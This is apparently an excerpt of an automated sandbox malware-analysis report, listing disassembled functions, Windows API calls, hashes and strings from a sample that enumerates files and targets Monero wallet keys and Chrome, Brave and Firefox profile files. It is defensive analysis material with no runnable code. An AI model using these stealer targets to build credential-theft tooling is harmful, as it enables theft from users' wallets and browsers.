                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: f2adac6829c95187bba53b9ab19aa6f3eb19378bb1196d9e34356e1013c436eb
                                • Instruction ID: 752ad098e9eb122c6ad07e409ba07b8970527ba38190f0086292b0dc380dd12e
                                • Opcode Fuzzy Hash: f2adac6829c95187bba53b9ab19aa6f3eb19378bb1196d9e34356e1013c436eb
                                • Instruction Fuzzy Hash: 6DE012B592430963CF0073B0AD0FF2A329C9B1574DF080825FA05D3102FA25F805A67A

                                Non-executed Functions

                                Function 00D938B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00D938CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00D938E3
                                • lstrcat.KERNEL32(?,?), ref: 00D93935
                                • StrCmpCA.SHLWAPI(?,00DA0F70), ref: 00D93947
                                • StrCmpCA.SHLWAPI(?,00DA0F74), ref: 00D9395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D93C67
                                • FindClose.KERNEL32(000000FF), ref: 00D93C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 759a49bad4fd0577284adf68706fb7401a1a98fc87b14522306822fa6c682215
                                • Instruction ID: a2109918f611b35500763aa4eaeeece2dd7844402f47e3afd5d1d1c587d02fea
                                • Opcode Fuzzy Hash: 759a49bad4fd0577284adf68706fb7401a1a98fc87b14522306822fa6c682215
                                • Instruction Fuzzy Hash: F9A12FB190021CABDB24DBA4DD85FEA7379FF48304F084588A64997141EB75AB88CF72
                                Function 00D8BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • FindFirstFileA.KERNEL32(00000000,?,00DA0B32,00DA0B2B,00000000,?,?,?,00DA13F4,00DA0B2A), ref: 00D8BEF5
                                • StrCmpCA.SHLWAPI(?,00DA13F8), ref: 00D8BF4D
                                • StrCmpCA.SHLWAPI(?,00DA13FC), ref: 00D8BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8C7BF
                                • FindClose.KERNEL32(000000FF), ref: 00D8C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: e66dcce4897b5dd7e5abe75f3e63bd2e662dc2d81f6694b95cfbf7e20250cd1f
                                • Instruction ID: a6cd65b3f17b0302e434f8cee751c14148a3c7a5314079f65c3f80d43583a25c
                                • Opcode Fuzzy Hash: e66dcce4897b5dd7e5abe75f3e63bd2e662dc2d81f6694b95cfbf7e20250cd1f
                                • Instruction Fuzzy Hash: 2F422D72910118ABCF14FBB4DD96EEE737DEF94300F404558B90A96191EE34AA49CBF2
                                Function 00D94910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00D9492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00D94943
                                • StrCmpCA.SHLWAPI(?,00DA0FDC), ref: 00D94971
                                • StrCmpCA.SHLWAPI(?,00DA0FE0), ref: 00D94987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D94B7D
                                • FindClose.KERNEL32(000000FF), ref: 00D94B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: d38ed5c283f639aca7594db3c2855327061578cefa871787a85e431dc8e46152
                                • Instruction ID: e9219994447ebf47ff0a2f49e09babeb97d1d7827be6a63ab3bf95f65c2bbaf0
                                • Opcode Fuzzy Hash: d38ed5c283f639aca7594db3c2855327061578cefa871787a85e431dc8e46152
                                • Instruction Fuzzy Hash: B86152B290021CAFCB20EBA0DD49EEA737CBF48704F044588B64996041EA35EB498FB1
                                Function 00D94570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D94580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D94587
                                • wsprintfA.USER32 ref: 00D945A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00D945BD
                                • StrCmpCA.SHLWAPI(?,00DA0FC4), ref: 00D945EB
                                • StrCmpCA.SHLWAPI(?,00DA0FC8), ref: 00D94601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D9468B
                                • FindClose.KERNEL32(000000FF), ref: 00D946A0
                                • lstrcat.KERNEL32(?,0182EAB8), ref: 00D946C5
                                • lstrcat.KERNEL32(?,0182D860), ref: 00D946D8
                                • lstrlen.KERNEL32(?), ref: 00D946E5
                                • lstrlen.KERNEL32(?), ref: 00D946F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 16cd7094f299064116e79807f2977a505f0d8927a0e032133433a18d1a383747
                                • Instruction ID: 1aa148174a59f88f7d81bfde69bdb4b3f2be9772a865a5823e4e14c7dd3d2c83
                                • Opcode Fuzzy Hash: 16cd7094f299064116e79807f2977a505f0d8927a0e032133433a18d1a383747
                                • Instruction Fuzzy Hash: E55153B154021CABCB20EB70DD8AFED777CAF54704F404588B60993191EB75AB899FB1
                                Function 00D93EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00D93EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00D93EDA
                                • StrCmpCA.SHLWAPI(?,00DA0FAC), ref: 00D93F08
                                • StrCmpCA.SHLWAPI(?,00DA0FB0), ref: 00D93F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D9406C
                                • FindClose.KERNEL32(000000FF), ref: 00D94081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: 1bb34b33ddba045d1da562ef696e13e080027c5adc1c4862758b3c4c4095fef9
                                • Instruction ID: f83177994b80697217d40b383f282a916afe0ee13d98f86d7d0fa45c76f398bf
                                • Opcode Fuzzy Hash: 1bb34b33ddba045d1da562ef696e13e080027c5adc1c4862758b3c4c4095fef9
                                • Instruction Fuzzy Hash: B45136B690021CABCB24EBB0DD46EEA737CFF44704F444588B65996080DB75EB899FB1
                                Function 00D8ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00D8ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00D8ED55
                                • StrCmpCA.SHLWAPI(?,00DA1538), ref: 00D8EDAB
                                • StrCmpCA.SHLWAPI(?,00DA153C), ref: 00D8EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8F2AE
                                • FindClose.KERNEL32(000000FF), ref: 00D8F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: 9cec7fc5a7bb2fab012bcf45fcd8a333846d342a90c3879764c53c724bfcbfb1
                                • Instruction ID: e9d9d976c18728356cbc8720414fba96544fe3e6b0dcce4851f202b4edf814d3
                                • Opcode Fuzzy Hash: 9cec7fc5a7bb2fab012bcf45fcd8a333846d342a90c3879764c53c724bfcbfb1
                                • Instruction Fuzzy Hash: F5E19F73911128AADF55FB64DD52EEE7378EF54300F404599B50A62092EE306F8ACFB2
                                Function 00D8F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DA15B8,00DA0D96), ref: 00D8F71E
                                • StrCmpCA.SHLWAPI(?,00DA15BC), ref: 00D8F76F
                                • StrCmpCA.SHLWAPI(?,00DA15C0), ref: 00D8F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8FAB1
                                • FindClose.KERNEL32(000000FF), ref: 00D8FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: b29178dcc12b304c218fb62d3d0f10cd2dab3295a1df04625a57db7ce7fe2711
                                • Instruction ID: f5a25eca013e707c78551704d65f44872be19c7a2b55164ec559f3c34dfc6651
                                • Opcode Fuzzy Hash: b29178dcc12b304c218fb62d3d0f10cd2dab3295a1df04625a57db7ce7fe2711
                                • Instruction Fuzzy Hash: DDB1FE729101189BDF24FB64DD96AEE7379EF54300F4085A9A40A97191EF30AB49CFF2
                                Function 00D816D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DA510C,?,?,?,00DA51B4,?,?,00000000,?,00000000), ref: 00D81923
                                • StrCmpCA.SHLWAPI(?,00DA525C), ref: 00D81973
                                • StrCmpCA.SHLWAPI(?,00DA5304), ref: 00D81989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D81D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00D81DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D81E20
                                • FindClose.KERNEL32(000000FF), ref: 00D81E32
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 7381834bbf899f9a39dfbe236f7a9308a0b4fdf6c65091bb1da20d0ac0919b53
                                • Instruction ID: 07c1e854138e98c64b9a0f7bca79265f0e022bc6e4cd727c4c87eae68bc82d88
                                • Opcode Fuzzy Hash: 7381834bbf899f9a39dfbe236f7a9308a0b4fdf6c65091bb1da20d0ac0919b53
                                • Instruction Fuzzy Hash: C4129A72920128AADF19FB64DC96AEE7378EF54300F404599A50A66091EF706F89CFF1
                                Function 00D8DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00DA0C2E), ref: 00D8DE5E
                                • StrCmpCA.SHLWAPI(?,00DA14C8), ref: 00D8DEAE
                                • StrCmpCA.SHLWAPI(?,00DA14CC), ref: 00D8DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8E3E0
                                • FindClose.KERNEL32(000000FF), ref: 00D8E3F2
                                Strings
                                Memory Dump Source
